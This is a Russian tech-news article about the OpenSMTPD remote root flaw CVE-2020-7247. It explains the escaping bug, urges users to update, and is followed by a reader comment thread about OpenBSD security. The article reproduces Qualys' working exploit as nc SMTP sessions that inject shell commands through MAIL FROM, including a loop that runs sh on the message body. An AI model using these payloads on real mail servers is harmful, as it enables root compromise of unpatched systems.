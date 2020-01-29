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Уязвимость в OpenSMTPD, позволяющая удалённо выполнить код с правами root

29.01.2020 09:04

В развиваемом проектом OpenBSD почтовом сервере OpenSMTPD выявлена критическая уязвимость (CVE-2020-7247), позволяющая удалённо выполнить shell-команды на сервере с правами пользователя root. Уязвимость выявлена в ходе повторного аудита, проведённого компанией Qualys Security (прошлый аудит OpenSMTPD проводился в 2015 году, а новая уязвимость присутствует с мая 2018 года). Проблема устранена в выпуске OpenSMTPD 6.6.2. Всем пользователям рекомендуется срочно установить обновление (для OpenBSD исправление можно установить через syspatch).

Предложено два варианта атаки. Первый вариант работает в конфигурации OpenSMTPD по умолчанию (приём запросов только с localhost) и позволяет эксплуатировать проблему локально, когда атакующий имеет возможность обратиться к локальному сетевому интерфейсу (loopback) на сервере (например, на системах хостинга). Второй вариант проявляется в случае настройки OpenSMTPD для приёма внешних сетевых запросов (почтовый сервер, принимающий стороннюю почту). Исследователями подготовлен прототип эксплоита, который успешно работает как с вариантом OpenSMTPD из состава OpenBSD 6.6, так и с переносимой версией для других ОС (проведено в Debian Testing).

Проблема вызвана ошибкой в функции smtp_mailaddr(), вызываемой для проверки корректности значений в полях "MAIL FROM" и "RCPT TO", определяющих отправителя/получателя и передаваемых в ходе соединения с почтовым сервером. Для проверки части почтового адреса, идущей перед символом "@", в smtp_mailaddr() вызывается функция valid_localpart(), которая считает допустимыми (MAILADDR_ALLOWED) символы "!#$%&'*/?^`{|}~+-=_", в соответствии с требованиями RFC 5322.

При этом непосредственное экранирование строки производится в функции mda_expand_token(), которая заменяет только символы "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). В дальнейшем, подготовленная в mda_expand_token() строка используется при вызове агента доставки (MDA) при помощи команды 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...'. В случае помещения письма в mbox через /bin/sh запускается строка "/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}", где значение "%{mbox.from}" включает экранированные данные из параметра "MAIL FROM".

Суть уязвимость в том, что smtp_mailaddr() имеет логическую ошибку, из-за которой в случае передачи пустого домена в email, функция возвращает успешный код проверки, даже если часть адреса до "@" содержит недопустимые символы. Далее при подготовке строки функцией mda_expand_token() экранируются не все возможные спецсимволы shell, а только спецсимволы допустимые в почтовом адресе. Таким образом, для запуска своей команды достаточно использовать в локальной части email символ ";" и пробел, которые не входят в набор MAILADDR_ESCAPE и не экранируются. Например: 


   $ nc 127.0.0.1 25
   
   HELO professor.falken
   MAIL FROM:<;sleep 66;>
   RCPT TO:<root>
   DATA
   .
   QUIT

После данного сеанса OpenSMTPD при доставке в mbox запустит через shell команду 


   /usr/libexec/mail.local -f ;sleep 66; root

При этом, возможности атаки ограничиваются тем, что локальная часть адреса не может превышать 64 символа, а спецсимволы '$' и '|' заменяются на ":" при экранировании. Для обхода данного ограничения использован тот факт, что тело письма передаётся после запуска /usr/libexec/mail.local через входной поток, т.е. через манипуляции с адресом можно запустить только командный интерпретатор sh и задействовать тело письма как набор инструкций. Так как в начале письма указываются служебные SMTP-заголовки, для их пропуска предлагается использовать вызов команды read в цикле. Рабочий эксплоит приобретает примерно такой вид: 


   $ nc 192.168.56.143 25

   HELO professor.falken
   MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
   RCPT TO:<root@example.org>
   DATA
   #0
   #1
   ...
   #d
   for i in W O P R; do
        echo -n "($i) " && id || break
   done > /root/x."`id -u`"."$$"
   .
   QUIT


  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: Уязвимость в ld.so OpenBSD
  3. OpenNews: Уязвимости в OpenBSD, позволяющие повысить привилегии и обойти аутентификацию в smtpd, ldapd и radiusd
  4. OpenNews: Выпуск OpenBSD 6.6
  5. OpenNews: OpenBSD перешёл на использование OpenSMTPD по умолчанию
  6. OpenNews: В развиваемом проектом OpenBSD SMTP-сервере OpenSMTPD выявлена порция уязвимостей
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: opensmtpd, openbsd
При перепечатке указание ссылки на opennet.ru обязательно
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  • 1.1, Spoofing (?), 09:57, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –7 +/
    это не уязвимость, повторяю, НЕ УЯЗВИМОСТЬ.
    в OpenBSD уязвимостей нет, а все сервисы что вы запускаете сами -- вы запускаете сами, повторяю, ЗАПУСКАЕТЕ САМИ.
     
     
  • 2.5, Аноним (5), 10:08, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +7 +/
    Найс аутотренинг
     
     
  • 3.30, pda (?), 13:43, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Это не аутотренинг, это стёб над позицией разработчиков опёнка.
     
     
  • 4.31, Дон Ягон (ok), 13:50, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    > это стёб над позицией разработчиков опёнка

    Демонстрирующий, главным образом, непонимание этой самой позиции.

     
  • 2.20, Дон Ягон (ok), 12:21, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    > это не уязвимость
    > в OpenBSD уязвимостей нет

    Разработчики OpenSMTPD говорят, что есть. Но тебе, конечно, виднее.

    "Qualys has found a critical vulnerability"

    ( https://www.mail-archive.com/misc@opensmtpd.org/msg04850.html )

     
     
  • 3.24, XL (?), 13:14, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• –8 +/
    Спасибо ребятам из Qualys, которые на деле показали, что OpenBSD мало чем отличается от других ОС в плане багов и уязвимостей. Искать какой-то мифической супер-пупер безопасности тут бессмысленно. Просто на эту ОС редко кто обращает внимание и мало кто ей пользуется - отсюда и мифы все. Типичные неуловимые Джо. Хотя лично я не удивлён. В наш век маркетинга, рекламы всё это довольно типично.
     
     
  • 4.26, Аноним (26), 13:27, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Конечно, мало чем. Всего лишь реакцией за считанные дни и часы вместо замалчивания в течение месяцев.
     
  • 4.27, Дон Ягон (ok), 13:30, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    > Спасибо ребятам из Qualys, которые на деле показали, что OpenBSD мало чем отличается от других ОС в плане багов и уязвимостей.

    Ага, и не в первый раз уже. Как ни найдут дыру в OpenBSD, так сразу "на деле показали".
    Я тебе сейчас ещё на деле покажу, постарайся только со стула не упасть: https://www.cvedetails.com/vulnerability-list/vendor_id-97/Openbsd.html

    Не благодари.

    > Искать какой-то мифической супер-пупер безопасности тут бессмысленно.

    "Мифическую супер-пупер безопасность" ищут только недалёкие дебилы. Защищаются от кого-то/чего-то, а дыры или прочие ошибки есть примерно во всём, что сделал человек.

    > В наш век маркетинга, рекламы всё это довольно типично.

    В наш век маркетинга и рекламы типично кукарекать не разобравшись в вопросе.
    "Безопасность по-умолчанию" - один из принципов производства OpenBSD - это история не про то, что в OpenBSD нет ошибок, а про то, что ошибки есть _ВЕЗДЕ_ и безопасные (читай: параноидально-минималистичные) настройки по-умолчанию - это способ по максимуму предотвратить эксплуатацию дыр, которые в системе по любому есть, просто про них ещё могут не знать.
    Например, благодаря тому, что OpenSMTPD по-умолчанию слушает только локалхост, мы имеем local root, а не remote root.

    А товарищам из Qualys действительно спасибо, они делом, а не словом помогают делать OpenBSD лучше и безопаснее.

     
     
  • 5.28, ssh (ok), 13:38, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Я тебе сейчас ещё на деле покажу, постарайся только со стула не упасть: https://www.cvedetails.com/vulnerability-list/vendor_id-97/O...

    Ты зачем сразу с козырей то зашел! :)

     
  • 5.50, Zulu (?), 16:24, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > Например, благодаря тому, что OpenSMTPD по-умолчанию слушает только локалхост, мы имеем local root, а не remote root.

    То есть преимущество OpenBSD над другими системами это настройки по умолчанию? Т.е. OpenBSD это система для тех, кто не в состоянии настроить сервисы так, как ему нужно? Так вы этого слона не продадите.

     

  • 1.2, A.Stahl (ok), 09:58, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –9 +/
    Неуловимого Джо таки поймали. И при этом, к его большому огорчению, поймали не случайно, а ловили целенаправленно. Так что ему уже не отвертеться и ему будет очень больно.
     
     
  • 2.19, антикудах (?), 11:47, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +8 +/
    https://mobile.twitter.com/OpenSMTPD/status/1222288467046076417

    А это он так пытается отвертеться, да? Задолбали ыксперты.

     

  • 1.4, Аноним (4), 10:02, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    На странице Goals их сайта первая же строка: "Be as secure as possible."
     
  • 1.6, Анонимус2 (?), 10:16, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    >sh -c ""

    Вообще я бы за такое выгонял из профессии навсегда, но в секьюрном бсд видимо лучше знают как писать безопасно

     
     
  • 2.11, Аноним (11), 10:47, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Будьте так добры, накидайте ссылочек, как необходимо делать по вашему мнению.
     
     
  • 3.13, Нононим (?), 10:54, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Оне выгонять учились, а не тому как надо делать.
     
  • 3.22, Аноним (22), 12:40, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    Смотри postfix
     
     
  • 4.25, Дон Ягон (ok), 13:20, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > Смотри postfix

    Тот же postfix тоже позволяет запускать команду mda шеллом.

    https://github.com/vdukhovni/postfix/blob/master/postfix/src/global/pipe_comma
    https://github.com/vdukhovni/postfix/blob/master/postfix/src/local/command.c#L

    Да, старается этого избегать, по возможности. Но сам факт - некоторую функциональность логичнее реализовывать именно так, а не писать свой недо-sh.

    Проблема не в том, что процесс OpenSMTPD запускает какие-то субкоманды шелом, а в том, что недостаточно хорошо проверяет входные данные.

     
     
  • 5.41, Ordu (ok), 14:52, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Не совсем То что он недостаточно хорошо проверяет -- это проблема Но то, что о... большой текст свёрнут, показать
     
     
  • 6.44, Дон Ягон (ok), 15:13, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Для начала, спасибо за развёрнутое сообщение с текстом по существу вопроса.

    > Если ты написал функцию pipe_to_mda(...) то эта функция должна запускать mda и только.

    Если всё слишком хардкодить, получится прокрустово ложе. Даже postfix, в котором, насколько я вижу, сделано сильно больше, чтобы не запускать sh, даже он в некоторых случаях запускает его.

    > Если при специально подобранных аргументах она может запустить не только mda, а ещё и "rm -rf /*", то это проблема. Может быть лишь потенциальная, но проблема.

    Безусловно.

    > И они не могут не знать, что эта штука -- постоянный источник дыр в unix'овом софте.

    Знают. И даже пытаются валидировать входные данные, чтобы предотвратить это. Из-за ошибки в оной валидации проблема и возникла.

    > нужно взять и реализовать некое подмножество sh в виде C'шной библиотеки

    Я не понимаю, чем валидация данных в отдельной библиотеке лучше, чем в коде самого OpenSMTPD. Как допустить, так и недопустить ошибку можно в обоих случаях. Универсализация?
    Скорее всего, программы не являющиеся SMTP-демоном будут хотеть другие данные на вход и набор допустимых символов будет отличаться (и как бы не всецело).

    > Но фишка-то в том, что проблемы экранирования специсимволов шелла прекратят существовать.
    >  Почему OpenBSD до сих пор не написала такую библиотеку и не перевела весь свой код на её использование

    Насколько я могу понимать, никто не написал универсальную библиотеку, решающую проблемы экранирования спецсимволов на все случаи жизни. В любом случае, мне (лично мне) это не кажется очень простой задачей.

     
  • 4.32, Аноним (11), 13:55, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Спс
     

  • 1.7, Аноним (7), 10:30, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Просто нужно запретить создание произвольных процессов. Вместо этого при вызове приложения ему нужно передавать список разрешённых бинарников с их аргументами командной строки. Бинарники вызывать из программы по псевдониму, при этом передача аргументов командной строки запрещена. Весь говнокод отломается, туда ему и дорога. Придётся переписывать все программы на нормальную архитектуру: как разделяемые библиотеки с внешним API.
     
  • 1.9, Нанобот (ok), 10:42, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    >запустит через shell команду

    🤦‍♂️
    понабирают мамкиных иб-икспертов по объявлению, а потом удивляются, почему у них такие детские ошибки возникают

     
  • 1.14, ыы (?), 10:55, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    ой как нехорошо... как стыдно...
     
     
  • 2.35, Аноним (26), 14:28, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    ... писать тупые комментарии
     

  • 1.15, Аноним (15), 10:56, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    Ага, все-таки можно настраивать сервер через SMTP!
    А то все SSH, да SSH...
     
     
  • 2.16, neAnonim (?), 11:11, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• –4 +/
    Ну блин всегда так делал, а тут понабежали. Повторяю это НЕ БАГ, это фича.
     
     
  • 3.37, Аноним (37), 14:42, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Именно! АНБ просили "сделать возможнность", им сделали. А тут пришли какие-то анализаторы и нашли сделанное. Ну вот как после этого доверять всяким аудитам? А как же "национальная безопасность"? Она же важнее.
     
  • 2.17, Аноним (17), 11:15, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    ЫХыххыхы :)
     

  • 1.18, Аноним (18), 11:44, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –6 +/
    Неуловимый Джо отбегался по прериям...
     
  • 1.21, Дон Ягон (ok), 12:27, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Двоякие ощущения. С одной стороны хорошо, что нашли, с другой - похожее уже было, когда ж закончится? И тоже, кстати, Qualys нашли - https://www.opennet.ru/opennews/art.shtml?num=43090
    (К разговору о том, что "за openbsd взялись всерьёз". Ага, взялись, ещё в 2015 году).
     
  • 1.23, Аноним (-), 13:09, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    Самая бестолковая из всех *bsd и этот хайп про безопасность... ОС для фанатиков - вот только эффект Плацебо тут не работает.
     
     
  • 2.38, Аноним (37), 14:43, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Есть ещё NetBSD, которая без хайпа...
     
     
  • 3.40, Аноним (40), 14:51, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > Есть ещё NetBSD, которая без хайпа...

    ... и без каких-либо заметных достоинств вообще.

     
     
  • 4.42, Дон Ягон (ok), 14:56, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > и без каких-либо заметных достоинств вообще.

    Это, конечно же, не так. NetBSD вполне себе достойная ОС.

     
  • 4.46, 11 (?), 16:16, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > ... и без каких-либо заметных достоинств вообще.

    NetBSD и по безопасности (внезапно, да!?), и по сетевой подсистеме и по многим другим вещам наголову выше деревянной и упоротой OpenBSD. Просто там народ взрослый, опытный, спокойный и скромный. А компашка + Тео - толпа каких-то неврастеников с ЧСВ (не просто же так Тео выперли и команды NetBSD). NetBSD особо не рекламируют себя, тихо, мирно работают в своё удовольствие. То же самое касательно качества кода - поддержка вагона платформ обязывает писать унифицированный, хорошо продуманный код. НетБСД пишет профессура для души, а опенбсд/фрибсд пишут гики вроде Тео или какой-нибудь яндекс.

     

  • 1.29, Аноним84701 (ok), 13:43, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    > в OpenBSD уязвимостей нет
    > что OpenBSD мало чем отличается от других ОС
    > но в секьюрном бсд
    >  ОС для фанатиков - вот только эффект Плацебо

    https://packages.debian.org/bullseye/opensmtpd
    https://centos.pkgs.org/7/epel-x86_64/opensmtpd-6.0.3p1-5.el7.x86_64.rpm.html

    Хм, я так понимаю, что данная новость создавалась с целью сделать перепись местных "из принципа  прочитал только заголовок и первый абзац, но ценное мнение отпишу"? 🙄
    Ну или принципиально не пользующихся тем же OpenSSH.

     
     
  • 2.39, Аноним (37), 14:49, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Этих шутов из OpenBSD имеет смысл содержать только ради openssh. Что, собственно, и происходит. Ихняя система никому нафиг не упала. Поддержка десктопов там условная, а поддержка серверов - печальная.
    А вот openssh используется везде. Но ведь нет возможности этим работягам дать гранты на целевое использование, они все там с тонкой душевной организацией, поэтому и отщепились в пользу опенбзд и сильно обижаются, когда им говоришь, что их содержат только ради openssh, а всё остальное - болезненный технологический нарост, нужный только им самим и только для них самих.
     
     
  • 3.43, Хороним (?), 14:57, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Перепиши openssh на своём любимом яваскрипте и тебе не придётся больше содержать "этих шутов".
    Денег сэкономиииишь!
     

  • 1.33, suffix (ok), 14:15, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    А как все на exim гнали когда полгода назад уязвимость у него выявили !

    У всех такое бывает - а пользоваться надо чем удобнее !

     
     
  • 2.34, Дон Ягон (ok), 14:25, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > А как все на exim гнали когда полгода назад уязвимость у него выявили !

    Всё-таки есть разница между наличием ошибок в принципе и положенным на безопасность болтом.

    Насчёт конкретно OpenSMTPD не могу предметно высказаться - когда мне приходилось настраивать почтовые серваки его ещё просто не было. Но тот же postfix - хороший вариант вместо exim, если его возможностей хватает. Remote root там, емнип, не находили.

     
  • 2.36, Аноним (26), 14:32, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Так вы посравнивайте, что и в каких количествах находили у exim в тот же период его существования. А если уж в нём и нынче находят эпические уязвимости, то...
     

  • 1.45, Аноним (11), 16:03, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Не пойму, что здесь многие уцепились, за BSD или за людей с недостаточным (или наоборот с излишне достаточным ;) опытом в вопросах безопасности. Вон товарисчь Бернштейн, взял да подошел к вопросу безопасности с другой стороны. Результат, как видно на лицо! И не цепляйтесь сразу к словам, результат именно в безопасности.
     
  • 1.47, VeryWideOpenBSD (?), 16:18, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Заметил забавную тендецию, что в теме где встречается фэйлы про опенку очень знатно накручиваются минусики, лул. В 2020-м году что-то там накручивать.

    Согласен с товарищами выше, что Опенбсд это как неловимые джо. Обращают на них внимание - вагон багов, не обращают - ку-ка-ре-ку мост секурьюр ин зе ворлд, эт лист трайн то би зэ мост секурьюр ин зе ворлд ку-ка-ре-ку. Мне то лично всё равно, по барабану на опенку, но поведение сектантов умиляет. Чем бы дитя не тешилось.

     
     
  • 2.49, Аноним (-), 16:23, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Советую последить за Доном Ягоном, если он в новости, то обычно минусы встречаются даже в низу ленты комментариев. Хотя обычно на опеннете такое весьма редко. Обычно плюсуют/минусуют в топе ленты.

    > сектантов

    Сектанты есть сектанты. Они везде такие. Будь то пользователи OpenBSD или марксисты, либералы, социал-дарвинисты и прочие представители секс-меньшинств тп. Это уже чисто религиозный аспект. Логику тут искать бесполезно.

     
     
  • 3.52, Аноним (-), 16:35, 29/01/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > Советую последить за Доном Ягоном, если он в новости, то обычно минусы
    > встречаются даже в низу ленты комментариев. Хотя обычно на опеннете такое
    > весьма редко. Обычно плюсуют/минусуют в топе ленты.

    Советую проследить за анонимами! Если они в новости, то минусы встречаются везде!
    Причем, с бессмысленной и беспощадной накруткой, как недавно:
    https://www.opennet.ru/openforum/vsluhforumID3/119501.html#41 (упомянули о том, что Distrowatch вообще-то на фре и получили коммент "вы все врети и вообще это не нужный сайт" и -22 )

     

  • 1.48, pin (??), 16:22, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > вызове агента доставки (MDA) при помощи команды 'execle("/bin/sh", "/bin/sh"

    🤦🤦🤦 21й век, а openBSD разрабы еще в 20м.

     
  • 1.51, Iron_ (?), 16:29, 29/01/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Почитал тему. К чему эти бессмысленные простыни текста от юзеров опёнка? Какие-то козыри, какие-то ссылки. Что за детский сад? С таким кодом разрабы OpenBSD знатно опозорились. Примитивизм ошибок + убогое качество кода.
     

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